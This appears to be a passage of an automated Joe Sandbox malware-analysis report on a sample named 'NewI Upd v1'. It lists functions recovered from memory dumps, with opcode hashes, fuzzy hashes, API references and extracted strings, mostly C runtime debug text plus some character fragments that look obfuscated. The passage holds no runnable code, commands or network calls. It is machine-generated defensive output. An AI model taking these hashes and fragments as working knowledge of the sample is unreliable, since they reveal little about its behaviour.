                                                                                  • API String ID:
                                                                                  • Opcode ID: 6755dcedc1b2ef7c0bd08e494cc604054324a11e1bbdd5e4f6867e43ddf032df
                                                                                  • Instruction ID: 7355c7217346111f6345426dc3eff3aac9d2c134622e301c7531ec87ac94231e
                                                                                  • Opcode Fuzzy Hash: 6755dcedc1b2ef7c0bd08e494cc604054324a11e1bbdd5e4f6867e43ddf032df
                                                                                  • Instruction Fuzzy Hash: BA315A777082554BC7289E29C9D117FFBC6ABCD314F0A963EC9D95B281C9349E0587C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 27604e1c3e8b091486fc25ab16abd2ec8a7ef9ccf3b1e18a9b275b9f92a339c1
                                                                                  • Instruction ID: 91e45aedcb28ded6a9008fb30beeb3fb7a6901988a348a9e787500789e228583
                                                                                  • Opcode Fuzzy Hash: 27604e1c3e8b091486fc25ab16abd2ec8a7ef9ccf3b1e18a9b275b9f92a339c1
                                                                                  • Instruction Fuzzy Hash: E541367590C7618BD310CF149500327B7E29B86304F1A496DECD577392D77ACD058B9B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5b7452f8c29985e3f4db28db1e917da870dba1f8ac2489caa87a995ec766aa6c
                                                                                  • Instruction ID: 9864fd262235960a5423d839cf55279bcb808a247ebf0eff664ed4fe08cd9f2c
                                                                                  • Opcode Fuzzy Hash: 5b7452f8c29985e3f4db28db1e917da870dba1f8ac2489caa87a995ec766aa6c
                                                                                  • Instruction Fuzzy Hash: 8B1104BBB2657107F7108E359CC821B2352EBD632571B0175D941EB3D1C6B9E942D154
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14f4cb86edb1c9569952e9285bbb11fcb3cadc4feee776b8782821933271441e
                                                                                  • Instruction ID: 69dcaeb19ab1489af0720610b246af21ce148385d06bf28f43e4501eab4a8d3a
                                                                                  • Opcode Fuzzy Hash: 14f4cb86edb1c9569952e9285bbb11fcb3cadc4feee776b8782821933271441e
                                                                                  • Instruction Fuzzy Hash: 3421F87BE093104FC314CF3ACD5165BBBE3EBD5720F2ADA6D94D49B259CA3489028B85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd06e1004d67c72eb416ed982317c9c89d05dc17f4998694d4e7bd0884ee6537
                                                                                  • Instruction ID: deb44511d9ed4393da4a537ff2adcf9a22de5e5e9cad9b26ea8f8313d11ce65b
                                                                                  • Opcode Fuzzy Hash: bd06e1004d67c72eb416ed982317c9c89d05dc17f4998694d4e7bd0884ee6537
                                                                                  • Instruction Fuzzy Hash: 46113873B146184BD314CE29DC8465272E2D7C8228F29467ED459DB382DD7AED038684
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                  • Instruction ID: 5fe6cdd7a04d1f121e19d5debc3dec44b6869611d9e6b4115ad64ba02f5580dc
                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                  • Instruction Fuzzy Hash: 3211EC33A055D48EC3158D3C84005657FE30E97234F59539AF4F89B2D6D5268D8B8359
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a01111e3cc3a054d320bf4232393f9f989354403e48da384a003e6bf6dcb808
                                                                                  • Instruction ID: 224de1cacc24a61d367ec0dee3a2cce60aa1fda824205e213da5bf07b2dc5012
                                                                                  • Opcode Fuzzy Hash: 1a01111e3cc3a054d320bf4232393f9f989354403e48da384a003e6bf6dcb808
                                                                                  • Instruction Fuzzy Hash: F701F5F170071147D720AE15A5D0B2BB6AA6F41308F49093EEE4457342DF7EFC28C2AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0a218271294dc789d3ebdb7b0fdf5731afa5dce842de508b94a148a5e6edd50b
                                                                                  • Instruction ID: e8de7e9d53fa15681cc7f4b6fa4afcf97603ab3776200281ccb8d791e3f14eab
                                                                                  • Opcode Fuzzy Hash: 0a218271294dc789d3ebdb7b0fdf5731afa5dce842de508b94a148a5e6edd50b
                                                                                  • Instruction Fuzzy Hash: 5011D775A00208ABCB04DFA8D991DEEB7B5FF48300F6485A9E615E7352D630EE41DB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6cfd8def0552418de08249c60dc91ff7711c912fe44b6b3e56c059179ef2ee26
                                                                                  • Instruction ID: 10f8d81654ed20200f8f26e16946d78609ef302611aead37ce8144dafc355cb4
                                                                                  • Opcode Fuzzy Hash: 6cfd8def0552418de08249c60dc91ff7711c912fe44b6b3e56c059179ef2ee26
                                                                                  • Instruction Fuzzy Hash: 5FE09B37A8642587D31ACF50CC937F2B7E4DB0621DB1D616EC842E7151DB9C940A8695
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d53a7c6ae719fa367de4f0a15f00879f9d8f380c72010852acfbf4967d410320
                                                                                  • Instruction ID: de5ba00a6905eb8fecad162a5887e1396905fd5bbe337339f9a39050f13f082b
                                                                                  • Opcode Fuzzy Hash: d53a7c6ae719fa367de4f0a15f00879f9d8f380c72010852acfbf4967d410320
                                                                                  • Instruction Fuzzy Hash: 18E0DFB2C001507BF6203E115C03FBBB5A8EF46318F09142CFA8833143E539AA30829F
                                                                                  APIs
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 008803DE
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 008803EE
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 008803F9
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 00880456
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 00880461
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 0088046C
                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIMED ref: 00880495
                                                                                    • Part of subcall function 008815E0: type_info::operator==.LIBVCRUNTIMED ref: 0088161D
                                                                                  • ___DestructExceptionObject.LIBCMTD ref: 008804AA
                                                                                  • std::bad_alloc::bad_alloc.LIBCMTD ref: 008804B8
                                                                                    • Part of subcall function 00880D00: std::exception::exception.LIBCMTD ref: 00880D11
                                                                                    • Part of subcall function 00881A70: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00000000), ref: 00881B0A
                                                                                  • _Smanip.LIBCPMTD ref: 008804DE
                                                                                  • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 00880568
                                                                                  • weak_ptr.LIBCPMTD ref: 008805BF
                                                                                  • __FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 008805CB
                                                                                  • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 008805D5
                                                                                  • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 008805E1
                                                                                  • CatchIt.LIBCMTD ref: 0088068B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 2995349249-393685449
                                                                                  • Opcode ID: 133d8c400b900b2f2ff1f66a0d9d679e1f7d2857701b837c61dc4aad9c385da7
                                                                                  • Instruction ID: 9a66b6052bab30e7b99a23bd53bcd5d82c2412ad6340059c73c30a52784a575b
                                                                                  • Opcode Fuzzy Hash: 133d8c400b900b2f2ff1f66a0d9d679e1f7d2857701b837c61dc4aad9c385da7
                                                                                  • Instruction Fuzzy Hash: F1F172759002099BCF48FF98D891AAE7779FF54304F508559F909DB242DB30EA89CFA2
                                                                                  APIs
                                                                                  • __aligned_msize.LIBCMTD ref: 008A4E2A
                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 008A4E33
                                                                                  • __aligned_msize.LIBCMTD ref: 008A4EB7
                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 008A4EC0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aligned_msize__invoke_watson_if_error
                                                                                  • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                                                                                  • API String ID: 4254006664-1152488507
                                                                                  • Opcode ID: af8b68509c94c7042c0db34fb9defecd287242f35371f1ad832634a839bbfdff
                                                                                  • Instruction ID: 671f880d90555199d6e5cc2b4c31d58718d6d9b058d148020c9efb03b7428b30
                                                                                  • Opcode Fuzzy Hash: af8b68509c94c7042c0db34fb9defecd287242f35371f1ad832634a839bbfdff
                                                                                  • Instruction Fuzzy Hash: 4C913AB0E40208ABDB04EF98C852BEEBBB1FF55704F148158F515AB782E7B5A941CB91
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocString
                                                                                  • String ID: $"$$$&$($)$*$,$.$0$6$c$e$f$f$i$v$w$z
                                                                                  • API String ID: 2525500382-2085099315
                                                                                  • Opcode ID: 6d7c7a0dbb0022a8370e9057f8a9e3f48d7905c07737ac29dc6849f0bce9359b
                                                                                  • Instruction ID: 56e7b24f0a7cd8751bd983cfaaa3b2942c6c7838bcdb3ae0373f041d06e99b7c
                                                                                  • Opcode Fuzzy Hash: 6d7c7a0dbb0022a8370e9057f8a9e3f48d7905c07737ac29dc6849f0bce9359b
                                                                                  • Instruction Fuzzy Hash: D4716C2010DBC28DD332CB7C985878BBFD16BA7224F084B9EE0E95B2E6D77541468767
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 00892B40
                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 00892BE3
                                                                                  Strings
                                                                                  • Microsoft Visual C++ Runtime Library, xrefs: 00892F8F
                                                                                  • @, xrefs: 00892CAF
                                                                                  • common_message_window, xrefs: 00892BBB, 00892F1E, 00892F5E
                                                                                  • ..., xrefs: 00892E1E
                                                                                  • @, xrefs: 00892C0C
                                                                                  • minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp, xrefs: 00892BB6, 00892F19, 00892F59
                                                                                  • traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character())), xrefs: 00892BC0
                                                                                  • wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error"), xrefs: 00892F63
                                                                                  • _CrtDbgReport: String too long or IO Error, xrefs: 00892F68
                                                                                  • (*_errno()), xrefs: 00892F23
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule__invoke_watson_if_error
                                                                                  • String ID: (*_errno())$...$@$@$Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                                                  • API String ID: 3976807648-1633980848
                                                                                  • Opcode ID: 2ef668c008668f5e49dd8b9378651608a960bc1ae8a380c70a6e9e4ea92bc72c
                                                                                  • Instruction ID: e92116bc0299e89618645e7ff231dc54034431cf2a3f5eac814f6a5304bd68fc
                                                                                  • Opcode Fuzzy Hash: 2ef668c008668f5e49dd8b9378651608a960bc1ae8a380c70a6e9e4ea92bc72c
                                                                                  • Instruction Fuzzy Hash: 19D15AB0940229FBDF24EF94CC89BDAB7B0FB54304F0441E9E509A6291D7749B99CF92
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 00892630
                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 008926D3
                                                                                  Strings
                                                                                  • Microsoft Visual C++ Runtime Library, xrefs: 00892A70
                                                                                  • common_message_window, xrefs: 008926AB, 008929FF, 00892A3F
                                                                                  • ..., xrefs: 008928FF
                                                                                  • @, xrefs: 008926FC
                                                                                  • minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp, xrefs: 008926A6, 008929FA, 00892A3A
                                                                                  • traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character())), xrefs: 008926B0
                                                                                  • wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error"), xrefs: 00892A44
                                                                                  • _CrtDbgReport: String too long or IO Error, xrefs: 00892A49
                                                                                  • (*_errno()), xrefs: 00892A04
                                                                                  • @, xrefs: 00892790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule__invoke_watson_if_error
                                                                                  • String ID: (*_errno())$...$@$@$Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                                                  • API String ID: 3976807648-1633980848
                                                                                  • Opcode ID: e7d6dca3cba4404193129b723109dd4b30e8f5457faec6d11f31bbfd09bb0aeb
                                                                                  • Instruction ID: 777dcd0efb709580318ef36ad3c08772ce10cc832589a606466306353621a5b7
                                                                                  • Opcode Fuzzy Hash: e7d6dca3cba4404193129b723109dd4b30e8f5457faec6d11f31bbfd09bb0aeb
                                                                                  • Instruction Fuzzy Hash: F4D149B4900228EBDF24EF54CC4ABDAB7B5FB69304F0441E9E609A6281D3749AD5CF91
                                                                                  APIs
                                                                                  Strings
                                                                                  • Client hook re-allocation failure., xrefs: 0088709B
                                                                                  • Client hook re-allocation failure at file %hs line %d., xrefs: 0088707E
                                                                                  • minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00887195, 00887200, 00887419, 00887479, 008874CC
                                                                                  • Error: memory allocation: bad memory block type.Memory allocated at %hs(%d)., xrefs: 008870F1
                                                                                  • Error: possible heap corruption at or near 0x%p, xrefs: 00887229
                                                                                  • The Block at 0x%p was allocated by aligned routines, use _aligned_realloc(), xrefs: 00887147
                                                                                  • __acrt_first_block == old_head, xrefs: 008874BB
                                                                                  • Error: memory allocation: bad memory block type., xrefs: 0088710E
                                                                                  • %ls, xrefs: 00887189, 008871F4, 0088740D, 0088746D, 008874C0
                                                                                  • old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks, xrefs: 008871EF
                                                                                  • _CrtIsValidHeapPointer(block), xrefs: 00887184
                                                                                  • reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head), xrefs: 00887408
                                                                                  • __acrt_last_block == old_head, xrefs: 00887468
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcstombs_l
                                                                                  • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                                                                                  • API String ID: 3007373345-458177602
                                                                                  • Opcode ID: 08812db9bdec0cf840215f5c2ff6285428f105970fd7d0397f8ef3edec81394f
                                                                                  • Instruction ID: 076fb79feb56906fd52731495c8f02bcec831a0da0913a628bbca47b30b4bf37
                                                                                  • Opcode Fuzzy Hash: 08812db9bdec0cf840215f5c2ff6285428f105970fd7d0397f8ef3edec81394f
                                                                                  • Instruction Fuzzy Hash: B5026874A44209AFDB14EF98DD86FAA77B1FB49304F348118E915EB392D331E941CBA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitVariant
                                                                                  • String ID: !$#$%$&$'$Q$S$U$W$Y$[$]$_
                                                                                  • API String ID: 1927566239-3921750754
                                                                                  • Opcode ID: b2cc1a3b884791a097613dd928cd760dccae64a3ec2097dd97ae31fec544337d
                                                                                  • Instruction ID: 17e26026965e7bee98b4eefb4d4749cc3812fca4b7853f963f47d17c05ef618d
